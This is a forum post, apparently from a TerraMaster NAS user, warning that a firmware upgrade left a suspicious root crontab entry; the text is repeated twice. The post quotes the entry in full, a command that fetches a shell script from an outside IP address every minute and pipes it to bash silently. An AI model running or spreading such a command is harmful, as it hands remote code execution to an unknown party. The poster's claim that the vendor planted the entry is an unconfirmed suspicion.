MALWARE from TNAS Upgrade?
Posted: 28 Jun 2021, 22:49
Hi All,
I noticed the following as my root crontab:
root@NAS:/var/spool/cron/crontabs# cat root
* * * * * wget -q -O - http://195.3.146.118/tr.sh | bash > /dev/null 2>&1
0 12 * * * ntpdate time-a.nist.gov
The crontab was edited at the same time as my last update of the TNAS firmware/software!!! (The cron file date and time is the same as the OS files and folder structures that were updated - this did not happen "after" the update).
This currently appears to be a piece of "attempted" malware that came from TerraMaster during the upgrade process!!
I am now investigating the system and will have to perform more details analysis to ensure there are no other infections.
Why would TerraMaster not inform registered customers of this infection?
I will be posting this on larger global forums as I complete my own investigation, but please people - take precautions!!!!!!!
I noticed the following as my root crontab:
root@NAS:/var/spool/cron/crontabs# cat root
* * * * * wget -q -O - http://195.3.146.118/tr.sh | bash > /dev/null 2>&1
0 12 * * * ntpdate time-a.nist.gov
The crontab was edited at the same time as my last update of the TNAS firmware/software!!! (The cron file date and time is the same as the OS files and folder structures that were updated - this did not happen "after" the update).
This currently appears to be a piece of "attempted" malware that came from TerraMaster during the upgrade process!!
I am now investigating the system and will have to perform more details analysis to ensure there are no other infections.
Why would TerraMaster not inform registered customers of this infection?
I will be posting this on larger global forums as I complete my own investigation, but please people - take precautions!!!!!!!